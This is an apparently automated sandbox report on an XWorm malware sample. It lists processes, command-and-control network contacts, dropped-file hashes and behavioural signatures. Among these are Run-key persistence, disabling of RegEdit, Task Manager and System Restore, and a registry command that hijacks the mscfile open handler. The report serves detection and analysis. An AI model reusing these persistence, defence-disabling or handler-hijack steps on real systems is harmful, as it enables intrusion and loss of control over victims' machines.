C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | las-protected.gl.at.ply.gg | udp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/260-0-0x00007FF9FC433000-0x00007FF9FC434000-memory.dmp
memory/260-5-0x00000217001B0000-0x00000217001D2000-memory.dmp
memory/260-8-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
memory/260-9-0x0000021700380000-0x00000217003F6000-memory.dmp
memory/260-10-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_11wev4dl.sau.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/260-25-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
memory/260-31-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
| MD5 | 011e90b162cf67f34f91d6d563859817 |
| SHA1 | 30ce18995be9545ae88189bc3ff5defbd2392d11 |
| SHA256 | 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613 |
| SHA512 | 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d |
C:\Users\Admin\AppData\Local\Temp\temp.hex
| MD5 | fad3aaf3015914e834a9d0313fcd371b |
| SHA1 | a4715a153a79263436819905b87b54acae4b2227 |
| SHA256 | 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690 |
| SHA512 | 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a |
C:\Users\Admin\AppData\Local\Temp\Uni.exe
| MD5 | 09e870076cfaa16f20be5050834ba8ff |
| SHA1 | 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840 |
| SHA256 | f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4 |
| SHA512 | d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643 |
memory/468-39-0x0000000000D30000-0x0000000000D40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 56efdb5a0f10b5eece165de4f8c9d799 |
| SHA1 | fa5de7ca343b018c3bfeab692545eb544c244e16 |
| SHA256 | 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108 |
| SHA512 | 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da91425d0490a65f6e9317a1e831bdd2 |
| SHA1 | 46886dde43736432786516865dc7c2536398ea11 |
| SHA256 | 6e8bb649646ea0d2c9acf771dc32b365c08eb26b4f5bf88b003726ca3940a379 |
| SHA512 | abc0776b5c1885b9cda6b5ba5fa500afecc229309502c851e8db89c4aacd892acd7f9b08933a03e8b9bbfc3f1dfd477d53c25bf631015c2a43fa64804485efec |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9ff10ce90fa1f5a4e14683fade00fb08 |
| SHA1 | 200b762060211bfda71bd56157a50b20bf7aa842 |
| SHA256 | fc9dc034c4b550190df44882e548b24ec1a6f5a4bc92b88869b377f3ffc03185 |
| SHA512 | ef628c6b0f6fd67b3ba0684585df407716f8e03f29a9c1b72eee7615d1c315e1c832fe4095b1fa0e4690df0a02b6c331b0a3b5d6099cdcd8291ab1fdd7f19cc2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | de68ca68ee303dfddbd9454fa0936cc9 |
| SHA1 | 98e6c9050a451a86bf92abe4180cc67d2aea5819 |
| SHA256 | 104a212eae1936ca7621842115c62bdfc2e69d67d19d3bdbdac91209a67f5272 |
| SHA512 | 19de3dd8d3abca2388f563aa519aca32df4eeeb4ae0ed4d13979da4f8f019fd3e000f7f1e54214423fd82358c23f1d74b238540902a52cfc0046b5ffa84feedb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ae79f9644a1cb6c2536b818e32c2a2ef |
| SHA1 | f2f11f31c742f37c57021d9f758bf01d0f4cd827 |
| SHA256 | fd223703c5342d45b55338ca56af0f1ca7c06b9128c9e20d9777bcbbde43dd0d |
| SHA512 | 2c373f393a0813f2400db4aa3f365bd448c1ce877f5c36b5ffc3d9e7e8d59315f0ae025a6057125d2cb1eeedc15aaeb0fe6772bab32cb46232362af5d1a5b34e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log
| MD5 | 16c5fce5f7230eea11598ec11ed42862 |
| SHA1 | 75392d4824706090f5e8907eee1059349c927600 |
| SHA256 | 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151 |
| SHA512 | 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc |
C:\Users\Admin\AppData\Local\Temp\cknnzt.exe
| MD5 | 2841cd968c72817f9eef3a4bc2293d6e |
| SHA1 | 5b788259d501493a87f00deee64fa0943ab19e34 |
| SHA256 | e5a9784f523a6965622532199a42f696ca15557b473f84c12f18210085a20e95 |
| SHA512 | 82eded2b67775763669452be98f7c5eeb0a3cd34f4947753fef9cedea4a1f56b49223ed7ad8e68b77e54ab2bf004e9ba22107afdc23e2e168dc60f2013907bf0 |
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
| MD5 | 1d62aa3d19462f3d5575fc54159911b4 |
| SHA1 | b37eab86c0075245fcc517a280f0705f6dffb852 |
| SHA256 | 6acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36 |
| SHA512 | 78a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df |
memory/708-236-0x000002532B540000-0x000002532B57C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\reset survival.bat
| MD5 | ecde221cbc92ee55ae5b8c1a24e98f56 |
| SHA1 | ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee |
| SHA256 | b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb |
| SHA512 | 122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493 |
memory/4268-240-0x00000000071D0000-0x0000000007206000-memory.dmp
memory/4268-241-0x0000000007840000-0x0000000007E68000-memory.dmp
memory/4268-247-0x0000000007EE0000-0x0000000007F02000-memory.dmp
memory/4268-248-0x0000000008060000-0x00000000080C6000-memory.dmp
memory/4268-249-0x00000000080D0000-0x0000000008136000-memory.dmp
memory/4268-250-0x0000000008240000-0x0000000008590000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 74f05ed3358c5a90314fc3f2de8edbbb |
| SHA1 | a83797f4b6d98240dbf3154dd1fdd9fd8f299a14 |
| SHA256 | e15317e9b6c7b084a44146b2bf4a501af327f0f3b2894451afc8db4c52855093 |
| SHA512 | 5158d6b1e910a230c207ba9f5184d72867092b07fe9807cdc1c5b4e34ee21b971911419e2e6ab4ee39f47afa714e9a6b2bb7467fc3ac509279ed0fb72e2a4fa9 |
memory/4268-252-0x0000000008010000-0x000000000802C000-memory.dmp
memory/4268-253-0x0000000008A10000-0x0000000008A5B000-memory.dmp
memory/4268-254-0x0000000008950000-0x00000000089C6000-memory.dmp
memory/4268-271-0x0000000009820000-0x0000000009853000-memory.dmp
memory/4268-272-0x0000000073040000-0x000000007308B000-memory.dmp
memory/4268-273-0x00000000097E0000-0x00000000097FE000-memory.dmp
memory/4268-278-0x0000000009990000-0x0000000009A35000-memory.dmp
memory/4268-279-0x0000000009D50000-0x0000000009DE4000-memory.dmp
memory/4268-472-0x0000000009CF0000-0x0000000009D0A000-memory.dmp
memory/4268-477-0x0000000009CE0000-0x0000000009CE8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-27 23:17
Reported
2024-07-27 23:28
Platform
win11-20240709-en
Max time kernel
598s
Max time network
603s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Disables use of System Restore points
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\certutil.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\Recovery | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Recovery\ReAgent.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \Registry\User\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\NotificationData | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
